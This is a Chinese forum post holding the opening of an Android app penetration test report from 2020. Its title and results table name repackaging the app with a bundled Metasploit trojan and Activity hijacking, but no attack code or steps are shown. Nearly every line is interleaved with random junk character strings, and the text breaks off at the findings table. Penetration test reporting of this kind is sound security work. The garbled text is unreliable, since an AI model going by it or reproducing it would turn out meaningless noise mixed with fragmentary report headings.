找回密码
 立即注册

QQ登录

只需一步,快速开始

欢迎中测联盟老会员回家,专门使用25年老域名强势回归
查看: 764|回复: 0

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
发表于 2022-6-8 20:32:44 | 显示全部楼层 |阅读模式
7 c7 a3 x3 p% }, }9 s + `" E: G0 E1 M2 [3 Y9 Z" L

) A" f9 o$ ]7 @6 @4 I" B: [ 7 F6 j0 i; j5 u! M/ o
( |- B+ ~& n4 W. `4 C* ^! ?9 p9 @& ~6 t& Z

* c) @* v2 }& Z 1 x8 r6 g1 ]1 j" k
* \( [* q7 G3 }7 @0 m0 J" j 6 A, j- y5 {# K0 p- Q# `# m1 H

, \/ S* e- m5 S. \6 c4 D; X2 C+ [ D( u$ U" F+ p% O b 文档编号:                , x" ]' V% b+ ` $ m+ g9 Y0 Q+ y, |" m4 t

6 S! H! H* l5 R2 W% `7 o e% i* ]" W5 O1 U

5 Q/ w/ M9 p7 i4 n9 ?/ c & D7 X% \* v! y. v   ) g7 X4 i" @2 w9 D$ U # C0 O2 e( G! _8 P" u8 E4 q0 I$ a- F# J

& X( x; [* z( f9 r: S+ d% @* Y1 F1 e( P/ `/ U) S$ r

' O( U) Z" y& z. u- \6 L 4 N+ A; @6 a5 e2 k/ |, I5 o   6 x. B; X' h6 p* ?" v. P# ?# b2 `6 s2 T" S' {

5 m& ^- Z8 ~3 q4 K5 z ) g* Q6 M5 c( s7 |

G" ?9 C# z% W7 g* T 8 e9 _( g) P# @   ; s. ?$ _# H+ N3 ~/ [2 [/ d" j0 u# F8 c3 T; D, N& }4 z6 e

0 G6 R1 e; ?1 x; m$ Q1 C1 l8 e- A, M" h( r& C

+ [0 T( Z7 ?& E: M, W1 ]% h) Y7 H   ! C" c! _# g, H3 V: v $ Y5 S/ }8 V5 `+ O/ q* C

. a& T! W( J8 b2 I) u/ ~5 n6 [, ^

+ Q: M) j/ @3 `5 N% O2 U : ]7 S- k% M+ C/ |+ J2 Z   ' `; ]" H3 g) I* j. o ; A* l0 F2 x- v8 P

1 b; j( i& E# Q- \ 1 s2 p3 E8 @7 j$ B$ G0 C: c. R% g5 q

, C, z' f1 H+ \" l) |! L2 h0 A/ Y9 v: q% Q1 p2 `0 | 某某某APP渗透测试 0 y2 W, Z+ X: r% T9 w 4 `5 }0 f; `0 X

7 U' I5 |4 t4 o ! g3 b- u( Y$ Y2 K% _- g4 X5 a. g8 q

' _* ]1 P* j' u. d0 q/ l! F + w! Y# y, U v/ k. e   . `" R4 Z' B/ W0 [) f- Y" a# Q8 P4 O

: y# I9 O0 Y5 Y/ W1 U / p; k& C0 c& L0 [- S7 d

w% P2 i* J4 R0 h" T # P4 A9 P8 r4 F6 a/ U3 d0 a! ?   z A/ I C$ _1 K1 Q [4 b: t: n! D2 }- S

8 P6 |8 A5 s1 Z$ i8 f 2 u% x1 t0 ~5 {

, S* r. A/ B3 n1 { : t% [( o# _# R" e. I   4 n& }# L8 @* S G6 {+ L5 z 8 B7 n [# Y {$ T. s2 x

9 q* ^- ^2 N$ h4 M7 p3 O- h5 R/ N2 k+ P- c$ T

! t/ s6 H/ P8 `; s1 q' o; D. D4 `! g8 z 8 o+ }$ b2 B. l7 c7 e4 I   5 x! V/ c6 q3 y8 j; ^& e 5 t7 d) K& c: k9 \- z! q

. a( g$ I7 q8 ~, z1 c$ k' M 2 @$ u; N2 I9 q$ c. w. }0 B

# s7 S& s! t4 F' T1 m " x, |4 ?' A9 P; E* s+ e2 [" U5 U 技 术 报 告 I$ H: ]' b6 i. S7 _; O3 }" `" B6 y% Z O6 y( Z, `

& {" T! R0 ?/ l5 F* i" M * ` r( [1 f: O* _# q8 ~, D# N

6 a6 q: }2 M; {2 i. X3 D ' S" w& i4 p6 s) _; S   " {4 u7 w6 P5 Z; U J0 [" U$ k4 r( I# j

* r" l) ?& m. x6 g% k. X1 l3 p! i/ {( j+ ^! |

4 A& j8 N# y( Q4 U. }) H + {5 e, y$ B1 m   : d [% K' a, d8 K+ b8 A 7 e9 T, O% [4 o6 O% [* R+ c8 u

. h) K1 P# W( w* k# _ " L- I! u# |) w$ P Y2 Y" ]

: x7 |. O8 E1 F2 ` 9 M& t7 H E# c( s   ( w7 U, V% l% v% A d- S4 Z6 p, Y* a% s9 F

& \0 C8 h) _( [1 q& O; X4 u0 ^ Q1 m- T

- f. P( r7 c/ m# h8 @2 M* V: q ; g& \& d* ?2 W   1 G. ]$ ~0 q) B4 E6 Z' `7 }0 B+ g& M1 v0 S2 J8 j, {

- o/ O5 \. |9 p! g" ~1 K) a$ t9 g. x, a5 |5 @, z H

( y) n: o1 P) q. W8 l, ` 9 m4 _1 D8 V, W# p   5 S$ M4 ~ m; A: ]1 y $ n4 v7 j( \% \

5 t0 |4 I/ c1 j * P9 F; o: j" g) b

9 M$ ?5 Y: A5 u( j- Q+ [0 ~3 ^; E! c* B* }* k   # B/ A, c4 T% h: w, ?* B L ' Q2 \6 r7 D. r3 V' C

# J* s) E7 d' R , o4 j1 L& \7 ^9 b

4 K; G, O, d& C# U # @( x1 `' F' n1 w3 w   4 z. ^( P1 Z9 J : q7 A' q7 P4 L6 ^; F# R

/ L0 I! \( z& S; V . j) g1 f" Y4 h2 T3 Q! [

- M/ p1 Y: P: H# F) f! e% q% w 4 q; X/ L6 G6 M" {/ |   0 {; _' E& z& n7 }/ u% @' {' q( ]' ]4 a

3 x: r8 m3 L' o- H" ^ + z) ?8 Y* ?" @. O1 x

, N* [* a* d& l# B4 U 7 J0 t7 u- j, A   ! r- \# \, p! r& {. s ' ^$ ^( y# ? `

( h c B' r0 d& o' l3 u' R 5 p8 c5 T4 R% K( ?% K, ?

; r9 U( s5 C+ V. k3 J/ ~2 o 9 z3 U6 X! H% M+ U' Q3 p, F. Z   , X: i; v4 A5 [/ m6 I$ x+ W0 F i, _2 U8 m* Y5 a) L" j

. t0 |, o' ^3 y: d0 j0 g: K & F1 H/ G1 E* N: S

+ n2 [! A7 b8 R8 F: u7 H " D. g7 m7 \! Z% G7 `   * z) p) h8 z. V! S! S$ ^8 l$ W $ X9 r8 X8 U W4 n

( p& R6 K- C( m* q4 c$ ?' E7 i( S: d: R9 o

3 n) F" M& Q4 e7 u0 Y 2 ?+ d* W/ Y+ l# X   7 p" N0 Z2 n) x* F2 t- I. t 2 s# b9 M! C Q" U/ ?

4 c1 U6 v( q R Z5 i 5 A- o8 i5 ]) ?* c6 I

5 S. j) k6 Z) M- F& D( }# X/ _' Z ) |1 }1 ~0 C2 i0 l, ?9 e   ! U! K, [; P% [) Y) c4 J) ^( ~ 6 v4 q' z A1 V) T: Q4 G

9 w/ V0 n% h. }$ B4 Y# y # W& q% `4 n6 R0 R, N4 `

! y4 W0 T7 V1 X! G" p) B 1 C0 g8 q2 ~3 K, _2 O% F0 u2 O" W/ V   3 }& J) \( ^6 M ; f/ _+ P% U8 Z, ^" C @% p }+ N: S

$ n% u5 n" R1 \1 v! ~6 z " k1 N5 p- V3 |$ Q6 H) q. R: f: v

7 c2 J" O, r U; S4 i0 b! O ! {3 k4 s t1 V$ m+ S5 g( c   ) r b# H0 A- ]0 y. z * B0 k5 h4 Q5 h- J I+ J

$ X5 u% ]* b) N9 d) b) C % r# P5 b4 M6 ~9 u( \; s

* w/ O( z# E! M: o9 ] r5 q( W2 ?" m5 v- k3 t0 `6 L: j* z   + X: O5 S2 |( a' p. d, t1 ` 4 _6 @! R1 S- n

6 N& ?9 C8 w. m& V: x2 i ! t% z7 r( o5 T5 Z: T$ h% e4 `

" G }+ _1 w- m$ p7 |& H5 @( T" k% m' U+ M: m. S! ]) G' ^* p1 b; w" b8 T$ d% ]   / g4 s; X" b s* r0 `: R% C9 P7 r

, b) K9 ~0 p3 X6 @ 1 \! A! B# `3 d% n

. j) b( l2 L$ L6 y ) V9 ?9 \# N4 Y S% @! r. \2 D, z   0 Q, k" \: c* x/ ?3 z i: }- C7 S% f" ~0 v

w" O$ p0 \7 m* P3 M& z e# E7 e7 i# W* N1 |; f

. r Y/ A1 J3 c5 A $ r6 ?2 ]/ V7 i- v4 v 二〇二〇年 - g5 p, |1 ]+ ^) ], h 8 j" }1 u) z0 W) D. h

# v$ n& P2 W3 r7 a6 H ( Q7 z) a: s) x% _
- u) p/ e$ E: a+ ~8 m0 u; ^ ( ^; \/ t9 q% v' u" t
7 u3 U0 W% _; c; C* M$ u. t9 P* O+ G6 m- R
1 d% a3 y" S4 i" Q/ x! p , f. [) t+ e0 m W+ u x
. C' C: }9 ]3 T6 t8 ?6 V) I8 P / P" l9 k5 o& _' z
9 G9 v! L; X& N) k4 ?# d8 s1 F+ z' L 2 M& a, G2 Z+ E3 o6 N% X
8 d: j8 y; o- M . u; `( z z; c
! |* j2 ?# I* H / k* I, J0 }% w
8 U# P" H/ G% @- D2 V- Y7 t. \# n1 c' T' W- ?! b( T3 q

$ w/ _! _) m# o4 s9 m4 N2 x/ n4 m + e" c" @8 [, H9 V/ z3 _( q2 K( t 目 录 " f# e: l) b+ b: k4 }- H. m% i : N9 Y7 u$ f% o

) d" R2 }4 ~! K9 |. Y* ^ A, T- b6 a$ J. o 5 F% L4 w+ f' K: F T- s( C8 X2 Y5 P$ |4 v1 m

1 d1 \, p8 g% Q O$ }( E8 A3 B   7 D: A9 v1 g7 L& |" D + T) p' [: c' ~' m4 p4 G. H4 H

$ Q: J6 v% Q% c7 I0 t7 J" G & U! q5 g+ K) z; S/ O4 x

% T9 W. [$ ]2 f$ `5 @3 G( K) k7 L1 Z( c" ^' h9 M* A) L 1 概述... 3 ; Q1 M2 n, s* w& g4 i; G ; R/ E, [$ G1 N: _* N

' s+ Y$ a/ {7 ]# e7 F3 D' ^- j6 D% d# t3 a: X d

( P, ^ w; K: y( S 9 v7 K$ ~/ a% B8 k- S 1.2测试时间... 3 + Z, m& a! h0 N& i& V+ B; n# f" F3 ?6 d2 h$ A2 P' [

* X( Q4 |7 @5 `8 D8 U( U$ c3 t4 r) [$ e* }* N$ V+ F+ C1 I, w

0 {, L' S, [! ~ 7 u1 z, I' @7 ]1 R 1.3测试对象... 3 , I f, E6 K: ?7 L) P4 s9 a 0 ~) g. B! G) R& n9 m

# Y# r7 q6 {1 s6 D! P! l, S6 @2 @# k

5 m- }2 F' g- Y# {( L+ Q 5 [: K1 O. O- c# b8 J h0 R C 1.4测试结果... 3 8 _! e7 _* _& t , i" u$ A. _( g" H- F7 L2 P

% B, r4 A+ v3 }3 P! |, t/ ~( h 5 ?1 s7 W* l8 C( \- L

" V; y& M& D6 ^' t5 b' q4 ~ G. q% s+ _4 @& O 2 检测结果... 4 / Z4 p$ r, R6 e+ b+ [5 j, U, ? 1 o4 k L; G: O# C+ p6 R6 A1 r7 U

4 {8 R/ Z! n# A! P# Z+ I- a# r; x( O 6 u1 t6 {) p P+ J

' F! S7 v" \% `; L/ { # x9 F2 @# a- ] 2.1 某某某... 4 $ Y, _9 `2 }4 i * v4 ]$ M% Z1 O/ B2 {

8 j( c! H# C9 v1 u - p! ?1 O2 F0 i. X# B" f; i

1 [6 s4 c$ u5 x s ' ]* M" G* x H. F$ y9 H. F8 J/ B 2.1.1检测目标... 4 + w& f' h# s* |2 k4 R, }) {' t* c5 D! o% F8 s- H# }" I

. K+ t* g7 S( T: i7 X( [; S( [ ( q1 T1 \; u# L

1 R" _1 F. i) D5 q0 c: t4 r" s# R7 C/ x8 e- O' j 2.1.2检测结果... 4 - {1 e2 w& B: q3 {5 r , u, R- o; a- Y, z U) B' T, L

( w4 G7 L9 f" U! ^3 C) Y+ Z$ I9 o0 |% u) G- C4 y. i! E) X8 o" R2 N2 P4 d

: d* o- _! M; P( Z( _ 6 r8 {. i0 A( w$ Y 2.1.2.1. 4 ' c R; d$ ~4 g& N# n! a# |( ?# w, i, u

3 l9 o5 o/ P5 X s2 L- n# O9 I, H # t/ Q1 X& j% u" z3 J# u: |

6 v4 g5 e; h$ O- X/ R1 u ) w/ \2 X" U5 H# y: h5 Q& }/ i 2.1.2.2. 6 * W2 z) X2 F6 y3 ?/ S8 _6 y/ p* g ! A) I8 v3 w: C X6 I% S9 h

$ _( W; t$ R) N F & A# d* b( @3 a I) \- X

: D; x6 h, T2 S" r. f3 N& v- u7 n2 E$ V) k. u) c " x0 F& ^; i, s7 {7 }* l' t! D% K% c1 ]% k( o

6 ^4 ~/ J! E; Z1 e# E" d+ u8 A5 ?. i* X A; e" s% N# P
/ E& [( C% L8 T; J5 y/ o* h( s+ Y* ~2 Q
" o% @% }3 I7 C2 d- ?' K V . N ]/ P" ], |/ ?" X. S
9 T7 T. s9 w3 D3 P" N5 G. q5 O0 ]) t9 R5 h% q
7 N" {1 e, o2 Y/ }( y 6 ], h, i1 ^" o& \% E

) I4 j4 d$ }6 N- F$ S6 P; H 1 v2 F" J) q6 R8 T8 C, M 1 概述 1 O% F0 g' E( f) @ / A5 x+ M) M# d1 ~1 @6 k

i' h G( E& E. P . t/ Q* t' X: L

% A4 f/ k M2 p6 e3 F$ ^# H! S$ | 9 `( n% }% x/ V0 [7 W2 q 1.2测试时间 $ ^1 r* R7 n. y; G+ g & P/ F( J$ e' |; Q1 ^/ J

- a; L$ ^4 n7 \. B; ~, G b" @ k9 H) Y8 t ; h$ i1 K& t# P' H. g# W8 j2 C. _+ p" I- o; ]7 X* b& ~7 g8 x" g1 f+ M/ x! L+ k8 q6 n- Z- |! e: B Y- R7 t6 B: ~) U9 m; Q% f) f; F* r4 N; b6 m+ h" K, c8 d, Q8 i; ?0 K' C, t* I. F& I2 s( i2 H, B% ]7 x- ^4 W- D$ n" n& [* i# J* g- U/ C1 E9 ?+ h+ Z- q" |8 P$ U* f6 _5 e& w9 z7 Y3 d+ V5 i, O' [7 a& I. [, c7 i' `# T" X+ R9 `1 z: c8 _8 `8 h7 }/ X6 ~$ J4 z2 r: ?/ t$ s u- Y( n O h7 O; F& g7 r) [, A$ A3 }/ I2 ~, t* j1 k$ `7 M2 P; y$ }0 b# \& l3 T3 E( v7 X+ U+ c# p) I4 A; W) e& U E ~1 j# g* }' J% E9 B) Z, ] Z" Q6 l; e8 |2 G( o: v2 r7 d8 ]0 Q) v, M/ [1 W9 W/ Q6 c7 @, O* W2 c; D: ]. |2 g6 z& d$ h, S/ @, Q. {4 ?4 A8 G1 m- F3 ]) F. T, Y+ N0 t2 l/ u! Q
2 Q4 K/ Z4 m+ L( S5 T* v 7 Q) U; u. n- v8 y$ d3 K" ^

& \* d T+ y3 K3 Y7 D# s8 g7 ~/ h7 c1 M* H# | 渗透测试时间 5 O3 |4 Y m( c( a ! y# o) n c2 R% I' S. T

0 E" } M+ O) p# V2 B, s$ X" @ 7 h. `: o, C' }9 a
3 @5 e/ J2 ~2 E* l+ e( H4 \ % o. t3 g4 K4 ^2 ~3 C9 N: J3 h% A' R

- Q$ L/ h! i k ]% f + Y9 C* Q; b/ E) w" i" c( R 起始时间 : {& Q' t. a/ T0 k ; q* ?: M0 s3 t2 h7 l3 t! _% t

, |2 \8 H. Y5 |" g' A1 v, N3 H. v 9 z: \$ f( O5 ?. H9 s. f; q% l
+ [5 c- _$ l7 v8 o; J ( y" u& ~$ H' @/ ^; T) ~

0 X6 S" o2 n4 a d : B5 T0 S0 B6 c 202046 + h' ?, V9 |. i1 W$ V # P( ]$ L1 a/ S, S2 J! H: T* v

- c( \+ ^5 o5 h+ m 7 j3 Y& y1 Z- n# e/ `2 q
4 n! B1 |7 H6 @) O: a & ^7 q3 D S( j& J+ `( @/ k& Y

0 f8 e; t7 f% |: D4 [) s r' S; N* Z& _ 结束时间 9 h# h x2 D+ _: J 9 o1 p ?2 U' Y: L( v

; H# F6 P u' U, j4 V' _ 0 }- q, ?9 X g
1 U, r* i' a9 g7 ]% r : t) W* z7 M2 f5 h% {

7 D2 P, X, q1 Q6 K z " v4 k: a* _0 y1 q9 {# |' P8 O 202049 : U/ l% J1 Y8 T; C$ d ( d# ^% _1 ?, ]8 Q

) `" B! J6 u6 B% c7 J ; |1 k; u2 }* k' L
2 k, R, v, k! o" v - i2 w. I: N" O# A) w

4 R' x& v2 S) \/ z% l' }* V, O& p5 G 1.3测试对象 . _. u0 Y* M. N, w+ D# ^ ' v8 W1 T9 L. y( o1 y

' }, l" K! ?' T/ L7 ^ , d7 p7 T+ j& W) a* S# @" {

* x# M$ G: N' d/ Z Z0 | 8 }; T u+ J0 T! U 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: ! L, o( V4 H! @: z2 U r* ~ . x3 T% U9 A6 o2 \- S

: L3 o# G# T9 W6 ~" w* V0 |2 U7 E / r3 g5 h% J# [2 x. l: i

& n- ]& M( n% g6 v! L0 J9 q & p2 `( D! Q) c, h2 m: E 1-1 检测对象 5 ?( E- y9 a3 _2 V) U : Y. D, A' ~1 Z' e" @4 l

3 y& b& `# r- r) }6 s$ j; X8 r2 w8 V' [1 o1 {& Q 5 z$ g, Y$ w/ Q8 m: {* K; M* t# }; B! D! g+ w p9 K, W. n8 ?$ u ?3 g: t) K& e& j/ B Z$ @4 c# I# U! `/ s/ B4 M$ G) x8 P0 Y: c d# F2 c2 B, ^9 b2 g' V: m' b$ Q. @ M( r+ v0 g Y6 u) @) x' L0 z5 d+ N; F, }' w8 m9 K0 h7 ?$ i% c3 {3 N6 }" s2 q% f0 O. Z, j* m7 i& ]0 v* I, d$ x5 ~! ^& v6 m/ v6 G3 [& [1 J4 L1 R6 P: f' [% x( n3 r7 q( p9 G. g% s: `# j u& s- U9 r4 |4 M0 o3 I, l% W$ Y. h6 ^" U" f4 X5 r$ K$ ?$ j' `9 O p/ P6 M2 X! D+ c- {' l7 T1 l& P; ~* T0 t! b5 i' @2 I6 E9 W( a' q# Q0 Q |1 Q7 w% E. I6 D. W( d2 l4 K' f( Y3 a* ~' K& q8 z. x2 U9 L/ h" m. v3 N, g3 G( ?4 `+ J: D7 U% ^& m* T9 k/ k, B& o% ^8 c1 |" m1 G7 i7 F" E& ~- e* @7 p0 E3 ?& Z7 ]* U( A7 @; `/ R/ k1 g! `! i0 l$ l" N' l0 I6 n& ^0 q$ r3 T; S9 s1 Z/ B [* O; B) C; c6 ^- p5 x2 D( P" r- g
* _. `8 n9 k" C6 E/ F) V4 E. S9 _8 B$ ]! E

* d" G3 U; T) E3 l/ W/ F2 q + z6 a3 _5 Y+ ~2 R. R$ _ 序号 + `! v4 A! x. \0 N4 L. y! X3 d & n- t6 A0 @* p1 h8 M Q" {

# X( [- E0 K7 V& o* t$ B# A# M$ b9 a # _( L: o' }# s1 q( v" Z- B; p
+ `6 [- B2 m* |+ M; H7 V7 G0 G ) E: g$ c G, w' q- p

6 h$ T8 M! K8 W4 q $ Q6 F! i' L, O4 e$ b/ E 测试对象 6 c/ ^+ p) S( U" a0 u; [+ G5 F$ }6 p7 ~/ v5 b7 A4 i6 P8 u4 j

0 }3 Z! i1 x/ [% {- g& ?0 e3 _. u+ V6 s . U# Q( N" k6 F
( S- E% I1 L6 x( f . ~6 {- o8 }( M

5 g9 A2 b- \" d l8 C8 P! k! d4 X& q4 A9 O+ q$ E2 m 测试地址 & N' e O6 F4 I1 ?' q! D- U a! c3 G9 C" h

* _9 U! ~' M" s; c/ U 7 r7 w( o# \3 t% h& ?9 a
/ O, z. w$ \* \8 D ' ]1 m4 \2 X$ m8 B0 z% M) W9 J2 h

/ {1 o9 p. N' ^3 U3 S/ b( _ 2 z; o4 z1 w" I- h 安全漏洞 7 ?$ _$ W: ^6 C6 P7 ]" @ 4 {, w- K% {, s f6 U

$ c' r. O: ]- L. ^* N 5 B3 j# p9 l6 u0 B7 A) k* o
# c' i7 N# N$ \' a. ?* d9 X : i8 T: e! Z- J0 Y

9 \) g' M& F! U# L# T9 S7 b0 l r; q , q: I' y0 z* P 1 : v. u9 `" J# q: f8 _5 Y7 p9 J+ K( ]! D8 i: F. {( y

- @& z; u. @4 y2 N; b$ x r3 Y' J 0 k% s9 Z; u6 x. y* {9 _
( \) Y0 x, X4 M* k9 `; l k! C; E. ] B- _

! I& L+ o2 A1 o1 E$ d3 A: T" r* B% X( T: w' N, C0 | 某某某安卓APP 4 x) b. P% Y" W0 K # F' m) f! @, x r

& ?( `/ ^5 R1 `# C : h' X0 M+ w3 {8 o+ }/ C; u' N
6 \ ?* v6 O6 l * v, }$ ^2 i; w3 L" {

9 r/ a( U' ]2 s2 A* O" M& h: O/ j: j- v1 R   5 K# g7 K) a/ W8 E8 O4 [! q7 l, G' j6 L0 P# O

# Q( K8 o0 b; \; H4 j" s* ]- M( Y# f ' @4 C% @! { Y2 u
1 n% Z. o* n: w4 z! S+ P) A( E9 L/ P- G% T; x( a) l

# }7 Z4 n( R0 v& b# x4 x9 p, T! G) N* x5 M# A% T 2 * C7 z8 J- @8 _% S ' A- K% R* J8 }6 |; y! `9 J3 c- m

3 j' i) R( W: ^1 S/ _% @0 `7 S9 f$ g" @! Y
7 ~$ F4 G2 O) {) K8 M$ r5 {6 \8 O: J( Q2 m* R+ p

# z9 k7 A+ D! B1 b8 V & Z+ [7 [$ U5 s0 [ 1.4测试结果 6 O. o; k0 C! {/ ^ * ?& R: F. \0 ?3 b; M: g

; R9 a# R9 {4 ]1 J) Q : ]( E# T" g; R/ o# O; {

% P2 u( b5 h# Q4 ^& F & u3 f* D; W% D4 d/ y4 ? 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 3 n" k6 ?6 Q _) H& h! |+ ] l5 g: H5 R5 I% G

% i2 p* i" S3 i& Y& _# ^/ f. l$ p6 S, n* d: m

4 S- T8 a! ]0 T0 i( s" W& ] 2 q& V6 s- q; s   5 j& _5 L4 T6 _% e ( m3 h7 G: _0 ]: V

' j% Y/ h/ s/ s9 J D) e0 g& I# p% [& ~1 _6 }( P
- z9 e! B* n8 i1 B9 W, o W/ M: U4 f$ _4 q ) X) u9 L: L* _6 x* h; }, j5 W" D* _, ]/ I( H9 ?5 A& G, L% W: H1 ?/ O6 o* J- f$ X: R9 H1 z6 f, c ^6 \) j5 R0 Y; S3 Q$ `# P- }- o+ b4 ^( k0 G5 D" `, I! a1 `9 F, D6 M- M; \# \: m; |* V5 `+ r, t! D1 S5 m9 P/ ?& x$ Q# _* d! R6 k3 ~# b9 g g; r7 M/ c& S$ w" @3 R2 W+ }& \4 ] c8 A* X: s3 s" C- @; y5 P: Y! h. f4 Z: s5 y# G: i L# q$ ~# B8 e- w2 m9 y' [+ u3 P4 X r- i, c9 J( g; K5 V1 @0 t. f3 Q2 R( a( Q$ F+ U* ?4 X) x' _$ n! z: |& v1 n8 e; k3 b4 \% F& G O' O1 e0 {! [3 [( |$ a* ^2 p" k4 R1 D0 C* k: ~: J" l6 z2 u" L' n+ Z+ F2 B7 L; b1 q/ }( u0 E$ ^ T0 C+ n. T' ?. @5 r& Y8 ^" s& |5 |* s+ g' J4 e/ Z. ^% P4 Q; G- Y! R$ A# _2 q3 L) D% l ~% G/ o+ h7 H! _1 p' o H' [3 q, Q7 e7 {" W3 v% e+ @! \! @5 L& H* ^; s) Z: ?6 f: H5 I6 t# a9 ]( z2 r) U, O4 @/ B( Q- f6 B! Y! H/ y7 s! ^& Z3 w- U' X7 v) U3 M' X5 u% L1 @% ~% D/ M/ `3 L1 _# M \$ y7 U0 O$ }* _. @, j( W( t) r' g/ q0 Z3 `. _! q% x9 }$ g" X' ]9 [* w3 i0 R. z& D% ?) V& L. M- C: i! M2 k! e2 D6 z% F( X+ |$ k/ n1 t3 V; H8 |- q. J% C! W1 J8 P% o6 F; p. ?+ w2 v" A- S3 ]7 V2 ]: g# E _$ F7 _3 a' U& I" t, P! z5 G' m, n! ~0 M) S: `: y5 t9 J' b7 I! w# y% Z( n9 M- J" G# T/ M* a" `( O- H0 x( J
?6 z1 X: \1 X; H0 q; c $ [/ U% i H: h* f, o

4 p$ W4 U! |) u8 x: v, z! C4 b. I0 P% k5 |5 Z 序号 ' k& v3 o( K3 k' Q, Q' q% G( I' A+ C4 V7 h1 Q* D8 x

0 s7 |) ]5 b0 e( v! G9 _- P 7 i+ _/ f! [$ a
- \5 U& }( n0 d1 C 8 y$ n2 R. d; m. \; q1 p

( [1 ]6 ^/ ~/ X M, ? 3 `) M: s* Z" K$ [ }4 @ 系统名称 3 f: I1 l; S2 i$ H4 |/ D 2 b" _4 }: d+ H2 a; S3 x/ B k& y- t: K

3 ?4 M! U* h& m, p Y& a& q- D ; m8 D3 d9 J' U' X! a
( m9 D% @2 S1 `4 Z1 T: K - V7 @4 W8 K2 _5 s2 g# y, t+ F% [

* {9 q6 m$ |% ? O( P7 t8 v o( \/ A& x1 K N& d 漏洞名称 3 G( Z; v* t# _7 W6 Q0 _ ! E4 R' \: K3 E. Y, p1 x

# _& O" D$ l/ ^ z3 s 8 ~$ V Y. x2 I( Q- X0 q! ?
' M8 }. S4 p1 O$ f) O. g, v% R$ W1 f" v

# v- @/ ?! v+ X+ G " g" \$ g2 p. o' o& S 漏洞危害 ) o/ q. E% ~3 s! |) `# \7 g1 T/ { L0 j' h

" Y6 U$ d1 }- D- t 5 @- T2 y, @& O' N. d, K. @
& Q) M0 u4 N! i2 H; l1 W * F4 G' N7 B5 \0 X1 w

" l) N; A# I4 i6 K( l 6 x4 D3 }. i4 g4 X1 X 修复结果 0 c) e* K3 Z% O 2 r3 U# _1 B) g @

) O* Q4 R& d/ m9 O1 A3 t/ s7 i* }0 {+ ~3 `7 G; Z* X8 ]
/ O* R2 _1 f' u; ^% I. Z v 1 G" A4 i: C) h! V: l) u

2 s2 }& M- H, Q! o+ X& x / |4 c% y3 M' ?) j, n& U) X 1 $ S+ \# u* U3 F" ~6 m# S 5 e7 d$ Y) X5 E% \) X

+ |# ~" ^& ], T( _+ y0 n4 y / V7 b1 p4 C2 L5 v9 `6 a. K
" D/ D3 t8 C. T" J0 I " G$ T9 s3 Q* S) U; d

8 x6 m: N" X4 f& K9 p5 ~) { : F9 H7 y' t5 o4 J 某某某某某某APP . R/ F5 Q4 U9 I& \1 `' l2 ^; r6 ?- A+ b! \ X3 @

& n8 O- y; @6 T, o+ a& [/ A4 p7 f5 \ , C( G4 C3 [+ [5 M
* o$ R+ Y& D' F4 `9 { : i7 u* j& T, x0 t3 u5 r) `

. G2 i8 y9 F3 y. \/ o 0 i1 Z, k) K! R& E/ p1 d) Q Activity 劫持 * e# ?( W1 Q& b! y/ _ $ z& \/ o0 k6 w5 o% U9 u

. z7 i2 w$ H7 u4 o8 y/ P F$ G" _8 G7 ?" J& e) C+ N6 y

3 N+ z- e: L/ a " J8 m; H/ j8 O   J( r: p4 c2 `: _$ S' n6 C; l: ~0 V

+ i; V& g9 }, R$ m) Z0 _1 W, K* M+ t6 N( M6 I+ g* Q
* h. E% T5 w' j, v* \. d 6 Y5 ^6 [4 G/ b7 h( `

, [) J4 E8 @. x/ N$ I / `2 r w2 k, G7 A / f) f# u# \* U+ }' \6 L9 N3 u" A. \1 F

2 C3 G. U/ E4 V ( \; G4 ^5 G! }& w
9 S$ R% W, s% V3 y" W3 J * r+ l# R( W: `1 J1 N+ R) N

' H, @ K+ [5 P7 U , n" t. v/ y- I# ?% M   ( _+ s; D' z0 N1 w/ t& o& L, Z v& _

* c0 G. K* L2 q5 z: r+ T 2 K/ P! S" _9 Z; B+ l' x
$ Z( ^8 r7 W8 Y( M# y/ z ) k* n+ L* {8 S

" R0 ?# k9 p$ |0 W$ Y0 c ) T8 b) g5 G* n% \% m5 i, [ 2 }* l4 w8 R- X; [% z: G/ |1 ^) Z; Z2 x7 o# D u' x

/ q6 [7 I: Q" z6 `/ s8 y 8 p8 f) A! b! t- B t W% t
8 ~& k4 K: L. R1 n; U, I 4 J& `$ S3 \( R: ^, z p) y/ s7 `8 U

7 H9 u! K4 a. t, j$ r # D4 A2 r+ o' F9 j" O. z) [; u1 Z 某某某某某某APP 0 a, @% a k9 Y8 M6 C 1 ]3 C' L# ]# n7 n* S

; r: K4 }: m0 n0 L' i% K# z & w- R2 D8 k) g. r" P& { P1 a: U
& B* r/ Q; E2 B9 H2 u 4 s) [$ g3 U- d+ Y Q

! H& f0 j! U5 ? \7 ] ; U( e' T, J2 O) Z7 e 反编译二次打包捆绑木马、篡改APP代码 - c Z* _4 e* k U; }$ C3 a 0 d% @- L, Z; B

. ]& r7 @" j7 |2 X7 ?8 L $ R* X0 P- s$ X, Z
' W e) `: I! J5 t# E- @ j+ R6 ^" l6 d! C% G$ C( L

?& v" S( ~7 c$ y9 q' C 6 E+ ^4 j( V8 ~, ] / A" M0 {& M/ f; }6 n/ \ 5 Z8 c6 C$ x) \* F: y2 H: Z2 p

9 N5 j' ?- z. d" u- k, d6 r' A U
6 u/ t" P0 X8 I1 U # L u" R6 Q# _ l2 K

e+ U4 n2 Y; ~# y* r6 X & x& M& {! v( s/ y: ~+ L   / k" B7 G2 @; D2 c: n# R ; B5 h# ~. G; H. h Q2 u# p: M* m

- D* ~2 I+ M# O5 ^4 A3 b: R$ Y, b& P0 c) h+ x4 Z
8 F e: V# E8 B% ?, j4 z9 t, N 7 k) R' r" I/ e4 e' D
# G" }" G& ~0 P 1 K. {/ M$ S! w

p" g& k8 ~1 \ , q5 {) S' G5 T1 n1 z' m1 N   5 w% V; `( ~! {8 R9 c % i2 ? G4 ]& R' ~8 z/ i7 \% p

! n. f: S6 G* X5 T0 j( }, G/ N " |& Z7 S7 ?8 w& H, v8 l4 T

S1 I6 K$ O! Z/ r F2 r \; Y ) c9 w$ a0 y/ l5 S4 ] B 1-2 测试结果 4 K" p* N; ^( j ' u4 g* {! v/ Z: y

7 E( v1 {/ p( b A 5 C% q: j1 Y b

